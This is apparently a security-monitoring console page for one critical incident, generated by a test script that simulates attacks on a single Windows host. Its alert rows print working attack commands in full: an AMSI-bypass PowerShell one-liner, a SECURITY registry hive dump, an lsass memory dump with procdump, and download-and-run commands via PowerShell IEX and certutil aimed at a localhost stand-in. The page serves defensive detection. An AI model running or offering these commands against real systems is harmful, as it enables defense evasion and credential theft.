Back to list

Critical CINC-20251221-BCCE95BF new

Aggregate ID: aggind:561559e2fcea400ba3601b74d64aa30b:4454244454

Incident Overview

Incident ID CINC-20251221-BCCE95BF
Severity Critical (90)
Status new
Alert Count 14
Host Count 1

Timeline

First Seen 2025-12-22 06:32:18
Last Seen 2025-12-22 06:34:15
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
AI Powered IOA Execution Credential Access Command and Control
Techniques:
Command and Scripting Interpreter User Execution PowerShell OS Credential Dumping Ingress Tool Transfer

Affected Hosts (1)

DESKTOP-FNUMV3U

Related Alerts (14)

Severity Status Hostname Description Tactic Command Line Time
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:34
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:33
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:33
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 06:33
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:33
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:33
High new DESKTOP-FNUMV3U A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 06:33
Critical new DESKTOP-FNUMV3U A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\User\AppData\Local\Temp\security.hiv 12-22 06:33
Critical new DESKTOP-FNUMV3U A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\User\AppData\Local\Temp\security.hiv 12-22 06:33
High new DESKTOP-FNUMV3U An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\User\AppData\Local\Temp\lsass.dmp" 12-22 06:33
High new DESKTOP-FNUMV3U An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree. Credential Access C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\User\AppData\Local\Temp\lsass.dmp" 12-22 06:33
High new DESKTOP-FNUMV3U A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-22 06:33
High new DESKTOP-FNUMV3U Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\User\AppData\Local\Temp\cert_test.exe 12-22 06:33
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 06:32